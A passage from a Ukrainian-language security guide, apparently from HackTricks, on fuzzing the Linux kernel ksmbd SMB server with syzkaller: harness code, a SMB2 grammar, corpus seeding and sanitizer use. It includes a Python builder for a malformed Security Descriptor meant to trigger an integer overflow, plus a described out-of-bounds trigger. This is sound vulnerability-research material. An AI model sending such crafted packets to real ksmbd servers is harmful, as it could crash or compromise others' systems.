- vfs.c (VFS ops)
- vfs_cache.c (lookup cache)
Примітки
- Точні опції залежать від вашого дистрибутива та userspace ksmbd (ksmbd-tools). Перегляньте /etc/ksmbd/ksmbd.conf та секції per-share, щоб увімкнути durable handles, leases, oplocks та VFS objects.
- Multi-channel і durable handles змінюють state machines і час життя об’єктів, що часто виявляє UAF/refcount/OOB баги під конкуренцією.
---
## Аутентифікація та налаштування обмеження швидкості для fuzzing
SMB3 потребує валідної сесії. Реалізація Kerberos у harnessах додає складності, тому для fuzzing краще використовувати NTLM/guest:
- Дозвольте guest доступ і встановіть map to guest = bad user, щоб невідомі користувачі спадали на GUEST.
- Приймайте NTLMv2 (за потреби напатчіть політику, якщо відключено). Це спрощує handshake, водночас зачіпаючи SMB3 кодові шляхи.
- Вимкніть суворі перевірки кредитів під час експериментів (post-hardening для CVE-2024-50285 зробив simultaneous-op crediting суворішим). Інакше rate-limits можуть відкидати fuzzed послідовності занадто рано.
- Збільшіть max connections (наприклад, до 65536), щоб уникнути ранніх відмов під час високопродуктивного fuzzing.
Увага: ці пом’якшення призначені тільки для полегшення fuzzing. Не використовуйте такі налаштування в production.
---
## Stateful Harness: Extract Resources and Chain Requests
SMB є stateful: багато запитів залежать від ідентифікаторів, що повертаються попередніми відповідями (SessionId, TreeID, FileID pairs). Ваш harness має парсити відповіді та повторно використовувати ID в межах одного програми, щоб досягти глибоких обробників (наприклад, smb2_create → smb2_ioctl → smb2_close).
Приклад фрагмента для обробки буфера відповіді (пропускаючи +4B NetBIOS PDU length) та кешування ID:
```c
// process response. does not contain +4B PDU length
void process_buffer(int msg_no, const char *buffer, size_t received) {
uint16_t cmd_rsp = u16((const uint8_t *)(buffer + CMD_OFFSET));
switch (cmd_rsp) {
case SMB2_TREE_CONNECT:
if (received >= TREE_ID_OFFSET + sizeof(uint32_t))
tree_id = u32((const uint8_t *)(buffer + TREE_ID_OFFSET));
break;
case SMB2_SESS_SETUP:
// first session setup response carries session_id
if (msg_no == 0x01 && received >= SESSION_ID_OFFSET + sizeof(uint64_t))
session_id = u64((const uint8_t *)(buffer + SESSION_ID_OFFSET));
break;
case SMB2_CREATE:
if (received >= CREATE_VFID_OFFSET + sizeof(uint64_t)) {
persistent_file_id = u64((const uint8_t *)(buffer + CREATE_PFID_OFFSET));
volatile_file_id = u64((const uint8_t *)(buffer + CREATE_VFID_OFFSET));
}
break;
default:
break;
}
}
```
Поради
- Підтримуйте один процес fuzzer, який спільно використовує автентифікацію/стан: це дає кращу стабільність і покриття з ksmbds global/session tables. syzkaller все ще інжектує concurrency, позначаючи ops як async і повторно запускаючи їх внутрішньо.
- Syzkallers експериментальна reset_acc_state може скинути global state, але може призвести до значного уповільнення. Віддавайте перевагу стабільності і сфокусованому fuzzing замість цього.
---
## Генерація SMB2 на основі граматики (валідні PDUs)
Побудуйте граматику для fuzzer на основі структур Microsoft Open Specifications SMB2, щоб ваш генератор створював структурно валідні PDUs, які систематично доходять до dispatchers та IOCTL handlers.
Приклад (SMB2 IOCTL request):
```
smb2_ioctl_req {
Header_Prefix SMB2Header_Prefix
Command const[0xb, int16]
Header_Suffix SMB2Header_Suffix
StructureSize const[57, int16]
Reserved const[0, int16]
CtlCode union_control_codes
PersistentFileId const[0x4, int64]
VolatileFileId const[0x0, int64]
InputOffset offsetof[Input, int32]
InputCount bytesize[Input, int32]
MaxInputResponse const[65536, int32]
OutputOffset offsetof[Output, int32]
OutputCount len[Output, int32]
MaxOutputResponse const[65536, int32]
Flags int32[0:1]
Reserved2 const[0, int32]
Input array[int8]
Output array[int8]
} [packed]
```
Цей стиль забезпечує правильні розміри/зсуви структур і значно покращує покриття порівняно з blind mutation.
---
## Directed Fuzzing With focus_areas
Використовуйте syzkallers experimental focus_areas, щоб надавати більшу вагу конкретним функціям/файлам, які наразі мають слабке покриття. Приклад JSON:
```json
{
"focus_areas": [
{"filter": {"functions": ["smb_check_perm_dacl"]}, "weight": 20.0},
{"filter": {"files": ["^fs/smb/server/"]}, "weight": 2.0},
{"weight": 1.0}
]
}
```
Це допомагає створювати валідні ACLs, які зачіпають арифметичні/переповнювальні шляхи в smbacl.c. Наприклад, зловмисний Security Descriptor з надмірно великим dacloffset відтворює integer-overflow.
Конструктор репродуцера (мінімальний Python):
```python
def build_sd():
import struct
sd = bytearray(0x14)
sd[0x00] = 0x00; sd[0x01] = 0x00
struct.pack_into('<H', sd, 0x02, 0x0001)
struct.pack_into('<I', sd, 0x04, 0x78)
struct.pack_into('<I', sd, 0x08, 0x00)
struct.pack_into('<I', sd, 0x0C, 0x10000)
struct.pack_into('<I', sd, 0x10, 0xFFFFFFFF) # dacloffset
while len(sd) < 0x78:
sd += b'A'
sd += b"\x01\x01\x00\x00\x00\x00\x00\x00" # minimal DACL
sd += b"\xCC" * 64
return bytes(sd)
```
---
## Подолання плато покриття за допомогою ANYBLOB
syzkallers anyTypes (ANYBLOB/ANYRES) дозволяють зводити складні структури до blobs, які універсально мутують. Створіть новий корпус із публічних SMB pcaps і перетворіть payloads на syzkaller programs, що викликають ваш pseudo-syscall (наприклад, syz_ksmbd_send_req):
```bash
# Extract SMB payloads to JSON
# tshark -r smb2_dac_sample.pcap -Y "smb || smb2" -T json -e tcp.payload > packets.json
```
```python
import json, os
os.makedirs("corpus", exist_ok=True)
with open("packets.json") as f:
data = json.load(f)
# adjust indexing to your tshark JSON structure
packets = [e["_source"]["layers"]["tcp.payload"] for e in data]
for i, pkt in enumerate(packets):
pdu = pkt[0]
pdu_size = len(pdu) // 2 # hex string length → bytes
with open(f"corpus/packet_{i:03d}.txt", "w") as f:
f.write(
f"syz_ksmbd_send_req(&(&(0x7f0000000340))=ANY=[@ANYBLOB=\"{pdu}\"], {hex(pdu_size)}, 0x0, 0x0)"
)
```
Це дає пришвидшений старт дослідженню і може негайно спричинити UAFs (наприклад, у ksmbd_sessions_deregister), одночасно підвищуючи покриття на кілька відсотків.
---
## Санітизери: не тільки KASAN
- KASAN залишається основним детектором для помилок у heap (UAF/OOB).
- KCSAN часто дає false positives або data races низької серйозності в цьому таргеті.
- UBSAN/KUBSAN можуть виявляти помилки оголошених меж, які KASAN пропускає через семантику індексів масиву. Приклад:
```c
id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
struct smb_sid {
__u8 revision; __u8 num_subauth; __u8 authority[NUM_AUTHS];
__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
} __attribute__((packed));
```
Setting num_subauth = 0 призводить до in-struct OOB read of sub_auth[-1], яке перехоплюється перевірками declared-bounds UBSAN.
---
## Примітки щодо пропускної здатності та паралелізму
- Один процес fuzzer (shared auth/state) зазвичай значно стабільніший для ksmbd і все ще виявляє races/UAFs завдяки внутрішньому async executor syzkaller.
- На кількох VM загалом можна досягти сотень SMB commands/second. Покриття на рівні функцій приблизно ~60% для fs/smb/server і ~70% для smb2pdu.c досяжне, хоча покриття переходів станів недооцінюється такими метриками.
---
## Практичний чекліст
- Увімкніть durable handles, leases, multi-channel, oplocks і VFS objects у ksmbd.
- Дозвольте guest і map-to-guest; приймайте NTLMv2. Видаліть credit limits і підніміть max connections для стабільності fuzzer.
- Збудуйте stateful harness, який кешує SessionId/TreeID/FileIDs і ланцюжить create → ioctl → close.
- Використовуйте граматику для SMB2 PDUs, щоб зберегти структурну валідність.
- Використовуйте focus_areas, щоб підсилити вагу слабко покритих функцій (наприклад, шляхи в smbacl.c як smb_check_perm_dacl).
- Сійте ANYBLOB з реальних pcaps, щоб прорвати плато; пакуйте seeds з syz-db для повторного використання.
- Запускайте з KASAN + UBSAN; акуратно триажуйте звіти UBSAN declared-bounds.
---
## Джерела
- Doyensec ksmbd Fuzzing (Part 2): https://blog.doyensec.com/2025/09/02/ksmbd-2.html
- syzkaller: https://github.com/google/syzkaller
- ANYBLOB/anyTypes (commit 9fe8aa4): https://github.com/google/syzkaller/commit/9fe8aa4
- Async executor change (commit fd8caa5): https://github.com/google/syzkaller/commit/fd8caa5
- syz-db: https://github.com/google/syzkaller/tree/master/tools/syz-db
- KASAN: https://docs.kernel.org/dev-tools/kasan.html
- UBSAN/KUBSAN: https://docs.kernel.org/dev-tools/ubsan.html
- KCSAN: https://docs.kernel.org/dev-tools/kcsan.html
- Microsoft Open Specifications (SMB): https://learn.microsoft.com/openspecs/
- Wireshark Sample Captures: https://wiki.wireshark.org/SampleCaptures
- Background reading: pwning.tech “Tickling ksmbd: fuzzing SMB in the Linux kernel”; Dongliang Mus syzkaller notes
{{#include ../../banners/hacktricks-training.md}}